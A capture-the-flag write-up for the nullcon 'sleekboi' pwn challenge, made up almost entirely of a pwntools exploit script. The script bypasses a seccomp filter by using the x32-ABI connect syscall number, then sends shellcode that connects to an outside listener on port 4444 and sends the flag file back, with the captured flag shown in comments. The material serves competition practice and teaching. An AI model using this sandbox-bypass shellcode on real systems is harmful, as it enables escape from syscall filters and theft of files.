Tags: pwn 

Rating: 5.0

Writeup by disconnect3d (justCatTheFish); the script below is intended to be self-explanatory.

```
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template '--host=pwn4.ctf.nullcon.net' '--port=5003' ./chall
from pwn import *

# Set up pwntools for the correct architecture: load the target ELF and
# make it the default binary for context (arch, bits, endianness).
exe = ELF('./chall')
context.binary = exe

# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141
# Target address: HOST/PORT on the command line override the defaults below.
host = args.HOST if args.HOST else 'pwn4.ctf.nullcon.net'
port = int(args.PORT) if args.PORT else 5003

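def local(argv=None, *a, **kw):
    '''Execute the target binary locally.

    argv: extra command-line arguments placed after the binary path; any
          iterable of strings is accepted, None (the default) means none.
    a/kw: forwarded unchanged to gdb.debug() or process().
    Returns the pwntools tube for the spawned process.
    '''
    # A fresh list is built per call (a mutable default would be shared
    # across calls), and star-unpacking accepts tuples as well as lists,
    # where the original `[exe.path] + argv` only accepted a list.
    cmdline = [exe.path, *(argv or [])]
    if args.GDB:
        # gdbscript is the module-level GDB script defined further down.
        return gdb.debug(cmdline, gdbscript=gdbscript, *a, **kw)
    return process(cmdline, *a, **kw)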

def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host.

    argv, a and kw are accepted only for signature parity with local();
    nothing here uses them, since the remote service is already running.
    Note that this definition shadows pwntools' own remote() brought in
    by the star import. Returns the connected tube.
    '''
    tube = connect(host, port)
    if not args.GDB:
        return tube
    # ./exploit.py GDB: attach the debugger to the live connection.
    gdb.attach(tube, gdbscript=gdbscript)
    return tube

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.

    Dispatches to local() when run as ./exploit.py LOCAL and to remote()
    otherwise; every argument is forwarded unchanged.
    '''
    launcher = local if args.LOCAL else remote
    return launcher(argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
# The template's trailing .format(**locals()) had nothing to substitute
# (no {} placeholders), so the script is just this literal.
gdbscript = "\ncontinue\n"

#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: amd64-64-little
# RELRO: Full RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled

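'''
dc@ubuntu:~/nullcon/pwn_sleekboi$ seccomp-tools dump ./chall
asd
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x08 0xc000003e if (A != ARCH_X86_64) goto 0010
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x06 0x00 0x0000003b if (A == execve) goto 0010
0004: 0x15 0x05 0x00 0x00000142 if (A == execveat) goto 0010
0005: 0x15 0x04 0x00 0x0000002a if (A == connect) goto 0010
0006: 0x15 0x03 0x00 0x00000031 if (A == bind) goto 0010
0007: 0x15 0x02 0x00 0x0000002b if (A == accept) goto 0010
0008: 0x15 0x01 0x00 0x00000120 if (A == accept4) goto 0010
0009: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0010: 0x06 0x00 0x00 0x00051234 return ERRNO(4660)
'''

# ^-- the filter compares the raw syscall number against a handful of amd64
# values, so the amd64 connect number is rejected while the x32-ABI number
# (SYS_connect with bit 0x40000000 set) falls through to ALLOW. A policy that
# means to deny connect must also reject numbers with that bit set (fail
# closed when A & 0x40000000 != 0) rather than list amd64 numbers only.

p = start()
# Address of the listener that receives the flag. Kept under their own names:
# rebinding the module-level host/port here would silently redirect any later
# remote() call to the listener instead of the challenge server.
cb_host, cb_port = 'XXX.XXX.XXX.XXX', 4444
# Rewrite the syscall number in pwntools' connect stub to its x32-ABI value,
# which the policy above does not block. Bound to connect_sc rather than
# connect, because remote() calls pwntools' connect() and would otherwise
# find a string in its place.
connect_sc = shellcraft.amd64.connect(cb_host, cb_port).replace('SYS_connect', 'SYS_connect|0x40000000')
# Note: connect from pwntools leaves the sockfd in 'rbp' so we use it below
catflag = shellcraft.amd64.cat(filename='flag', fd='rbp')

payload = asm(connect_sc + catflag, arch='amd64')
# pwntools' write() dumps the assembled bytes to ./payload for inspection.
write('payload', payload)

p.sendline(payload)
# $ nc -vvv -l -p 4444
# Listening on [0.0.0.0] (family 0, port 4444)
# Connection from XXX.XX.XXX.XX 35450 received!
# hackim20{OMG_The_first_one_was_unintended}

p.interactive()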
```